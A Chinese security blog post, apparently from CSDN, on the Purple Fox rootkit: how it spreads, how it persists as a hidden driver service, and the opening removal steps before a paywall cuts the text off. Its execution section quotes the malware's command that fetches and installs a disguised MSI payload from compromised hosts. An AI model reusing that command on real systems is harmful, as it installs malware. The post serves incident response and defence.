木马病毒清除方式

最新推荐文章于 2024-06-23 20:26:48 发布
最新推荐文章于 2024-06-23 20:26:48 发布
阅读量3.8k 收藏
点赞数 17
分类专栏: 应急响应 Web安全学习进阶笔记 信息安全 文章标签: 安全 木马 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43510203/article/details/125729255
版权
Web安全学习进阶笔记 同时被 3 个专栏收录
109 篇文章 36 订阅 ¥59.90 ¥99.00
订阅专栏
信息安全
52 篇文章 2 订阅 ¥79.90 ¥99.00
订阅专栏 超级会员免费看
应急响应
8 篇文章 5 订阅
订阅专栏
本文介绍了紫狐Rootkit木马病毒的清除方法,包括通过安全模式启动、删除恶意DLL文件、清理注册表相关条目以及验证清除效果等步骤。
摘要由CSDN通过智能技术生成

木马病毒清除方式

紫狐(Purple Fox)Rootkit木马病毒,最早在2018年被网络安全人员发现,该恶意软件存在多种蠕虫化传播方式并使用驱动级维权方式,难清除是安全从业人员遇到最大的问题,在这里我们给大家提供一些入侵方式解读及清除方式。

入侵方式:

使用较为通用的SMB爆破、Sqlserver爆破、永恒之蓝等高危漏洞或爆破手段入侵。

执行方式:

创建一个恶意服务,然后使用Msiexec命令去公网上其他失陷地址中下载shellcode,形如:do Msiexec /i http://%i/08388E25.Png,下载的恶意软件通常是png后缀但实际为MSI格式文件,将shellcode加载到服务中后会将机器进行重启,从而将服务注册为Windows系统驱动,使服务做到隐藏效果(下图为现场取证时发现的隐藏服务,有意思的是可能由于程序的运行错误导致将一些正常服务也一并进行隐藏了),后续将使用SMB等入侵手段再次进行蠕虫。

清除方式:

  1. 安全模式启动 因为恶意的dll为ring-3级别的,正常情况下相关的dll无法直接删除&#

了解本专栏 订阅专栏 解锁全文
Sumarua
关注
专栏目录
订阅专栏
记录一次紫狐Rootkit应急响应过程
weixin_48421613的博客
08-16 3521
紫狐Rootkit应急响应分享,转载请说明出处
rootkit清除
weixin_30291791的博客
10-22 702
日常中,我们用一些anti-virus的时候可能发现这样一个问题,几乎有点意思的病毒+木马你都无法成功把他清除掉.不是因为杀毒软件产商没能力,而是这个方案对于一个产品来讲实在有些烂了,今天我的这篇blog要讲的就是这个话题. 先看一下ring3的方法吧 void Cxxx::FileDelete(CString FilePath) { BOOL bRet = SetFileAttribut...
木马专杀软件测试自学,5款免费杀软“紫狐木马查杀测试
weixin_39543835的博客
07-22 1380
本帖最后由 idayong 于 2018-9-21 21:57 编辑昨天看到360推送的紫狐木马http://www.360.cn/n/10386.html 里面提供了样本,这次正好来测一下“带毒环境”各家主流杀软的查杀能力(此前评测大都为引擎检出率的测试)主要选出5款大家常用的杀软进行测试:(均升级到2018/09/21病毒库,使用“快速扫描”模式进行查杀测试)系统环境:Windows7 x64...
紫狐木马的现象与排障过程
ihaveapanchan的博客
02-26 765
紫狐木马最早出现于2018年3月,通过与游戏外挂、第三方安装程序捆绑传播,该木马如同其名字一样具有狐狸般的狡猾,应用了极强的反检测能力,除了功能DLL文件加强壳外,还会通过加载驱动的方式进行隐藏,并且利用PendingFileRenameOperations实现延时删除,注入系统进程以躲避检测。
浅谈溯源反制与防溯源
weixin_48421613的博客
02-06 4687
溯源反制与防溯源的小谈
Linux下手动查杀木马Rootkit的实战指南
最新发布
weixin_43822401的博客
06-23 614
手动查杀Linux下的木马Rootkit需要对系统有深入的了解和正确的工具。通过模拟攻击者的行为,我们可以更好地理解他们的技术手段,并采取相应的防御措施。攻击者可能会编写权限维持脚本,这些脚本通过父进程检测子进程的存在,如果子进程被删除,父进程将自动重启子进程。它可以扫描已知的rootkit特征码,并检查系统文件的异常属性。rkhunter将执行一系列测试,包括MD5校验、检测rootkits使用的二进制文件、特洛伊木马的特征码检测等。请注意,本文中的技术仅供教育目的,切勿用于非法活动。
快速清除木马病毒快速清除木马病毒
05-06
本篇文章将深入探讨如何快速有效地清除木马病毒,确保您的计算机安全。 首先,识别木马病毒的症状至关重要。这些症状可能包括:电脑运行速度变慢、频繁出现错误提示、未经许可的程序自动启动、网络连接异常以及重要...
104种木马病毒清除方法
11-25
### 104种木马病毒清除方法详解 #### 一、冰河 v1.1 & v2.2 **1.1 冰河 v1.1** - **概述**: 冰河是一款早期较为知名的木马软件,版本v1.1主要通过修改注册表来实现隐蔽运行。 - **清除步骤**: - 打开注册表编辑...
木马 病毒 预防 清除 删除
03-18
**木马病毒**(Trojan),是一种常见的恶意软件类型,它通过伪装成合法软件的方式侵入用户的计算机系统,进而实施非法操作。与传统的病毒不同,木马病毒不会自我复制,而是依赖于用户的行为来传播。 #### 木马病毒...
最新最强的木马查杀软件
09-14
很牛很牛很牛很牛很牛很很很很很牛牛牛很牛牛牛很牛
beike贝壳木马专杀工具
01-21
专门扫描木马的工具,个人觉得还可以,对于保护个人隐私和账号有好处
CSNetManagerXp 木马病毒清除方法
04-30
### CSNetManagerXp 木马病毒清除方法 #### 病毒简介 CSNetManagerXp 是一种常见的木马病毒,它通过伪装自身为合法系统进程的方式感染计算机系统。通常这种病毒会利用U盘或其他可移动存储设备作为传播媒介,当用户...
紫狐(Purple Fox)恶意软件传播,蠕虫式的大规模感染服务器
学海无涯苦作舟的博客
03-26 1170
恶意软件不计其数,但只针对Windows设备的恶意软件,就是在2018年被网络安全人员发现的紫狐(Purple Fox)恶意软件,主要是透过网络钓鱼电子邮件和漏洞利用工具包进行攻击,还包括了rootkit,让攻击者将恶意软件隐藏于设备中,难以被察觉,而近期却出现了令人意想不到的模式进行攻击。 网络安全公司Guardicore发现紫狐有新感染方式,那就是新增了蠕虫模组,针对可存取网际网络,又可在内网透过SMB通讯协定互连的电脑,进行帐号、密码的暴力破解,之后将恶意程序植入这些电脑。 而攻击者在近2,000台.
【转】记一次Linux木马清除过程
tpriwwq的专栏
10-07 1500
Linux下一次典型的木马清除过程 包含很多实用技巧,运维必备
抓包工具:Fiddler下载、安装、使用 教程
热门推荐
Sumarua的博客
07-26 17万+
文章目录抓包工具:Fiddler下载、安装、使用 教程一、Fiddler 下载二、Fiddler 安装三、Fiddler 使用3、Statistics 请求的性能数据分析4、Inspectors 查看数据内容5、AutoResponder 允许拦截指定规则的请求6、Composer 自定义请求发送服务器7、Filters 请求过滤规则8、Timeline 请求响应时间9、Fiddler 设置解密HTTPS的网络数据10、Fiddler 内置命令与断点 抓包工具:Fiddler下载、安装、使用 教程 Fidd
御剑后台扫描工具下载、安装、使用教程
Sumarua的博客
07-26 5万+
文章目录御剑后台扫描工具下载、安装、使用教程御剑后台扫描工具 简介:一、御剑后台扫描工具 下载二、御剑后台扫描工具 安装三、御剑后台扫描工具 使用方法给御剑字典增加新规则 御剑后台扫描工具下载、安装、使用教程 御剑后台扫描珍藏版是T00LS大牛的作品,方便查找用户后台登陆地址,同时也为程序开发人员增加了难度,尽量独特的后台目录结构。 附带很强大的字典,字典我们也是可以自己修改的,继续增加规则。 御剑后台扫描工具 简介: 1、扫描线程自定义:用户可根据自身电脑的配置来设置调节扫描线程 2、集合DIR扫描 AS
中国蚁剑下载、安装、使用教程
Sumarua的博客
07-26 1万+
文章目录中国蚁剑下载、安装、使用教程一、中国蚁剑下载二、中国蚁剑安装三、中国蚁剑使用1、添加一个shell2、插件3、关于编码器4、user-agent修改 中国蚁剑下载、安装、使用教程 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 通俗的讲:中国蚁剑是 一 款比菜刀还牛的shell控制端软件。 中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思?
Sumarua的博客
07-26 1万+
赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思? 一般我们在参加一些”网络安全技能大赛“的时候,都会出现“Web、Crypto、Pwn、Reverse 、Misc”这五种赛题类型,往往很多新手都不清楚各是什么意思?代表了哪些方向? 今天就简单的给大家说说,具体如下: Web(渗透测试) 一般是指web网站渗透、漏洞利用。 例如:命令注入、 SQL注入、代码审计、 Restful API、Owasp10、BurpSuite。 Crypto(密码学) 主要是针对一些密码学,例如
木马病毒全攻略:预防、类型与清除方法
木马病毒是一种恶意软件,通常以欺骗用户的方式侵入计算机系统,以达到非法目的。它并非传统意义上的自复制病毒,而是通过人为植入并激活,从而控制或监视用户的电脑。以下是对木马病毒的理解和处理方法的详细介绍:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sumarua

创作不易,大爷给个鼓励吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值